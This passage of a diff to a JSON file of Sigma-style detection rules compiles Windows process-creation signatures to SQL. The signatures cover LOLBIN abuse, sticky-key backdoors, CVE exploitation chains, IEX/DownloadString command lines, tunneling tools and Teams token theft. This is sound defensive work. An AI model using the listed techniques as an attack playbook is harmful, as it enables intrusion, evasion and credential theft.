'%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msiexec_install_remote.yml" + "filename": "proc_creation_win_windows_terminal_susp_children.yml" }, { - "title": "MsiExec Web Install", - "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "title": "Suspicious PowerShell Invocation From Script Engines", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "status": "test", - "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Microsoft Operations Manager (MOM)", + "Other scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msiexec_web_install.yml" + "filename": "proc_creation_win_powershell_script_engine_parent.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", + "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "status": "experimental", + "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "WSL (Windows Sub System For Linux)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_mstsc_remote_connection.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", - "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", + "status": "experimental", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "title": "AgentExecutor PowerShell Execution", + "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" - ], - "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_servu_susp_child_process.yml" - }, - { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", - "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_lolbin_agentexecutor.yml" }, { - "title": "Suspicious Runscripthelper.exe", - "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", - "status": "test", - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "author": "Victor Sergeev, oscd.community", + "title": "Application Removed Via Wmic.EXE", + "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "status": "experimental", + "description": "Uninstall an application with wmic", + "author": "frac113", "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_runscripthelper.yml" + "filename": "proc_creation_win_wmic_uninstall_application.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "status": "experimental", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Exfiltration and Tunneling Tools Execution", + "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Execution of well known tools for data exfiltration and tunneling", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\socat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.execution", - "attack.t1106" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Lolbin Ssh.exe Use As Proxy", - "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", - "status": "experimental", - "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", - "author": "frack113, Nasreddine Bencherchali", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "status": "test", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ssh.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "New Port Forwarding Rule Added Via Netsh.EXX", - "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "status": "test", - "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Use of Wfc.exe", + "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "status": "experimental", + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1127" ], "falsepositives": [ - "Legitimate administration activity", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + "Legitimate use by a software developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" ], - "filename": "proc_creation_win_netsh_port_forwarding.yml" + "filename": "proc_creation_win_lolbin_wfc.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": 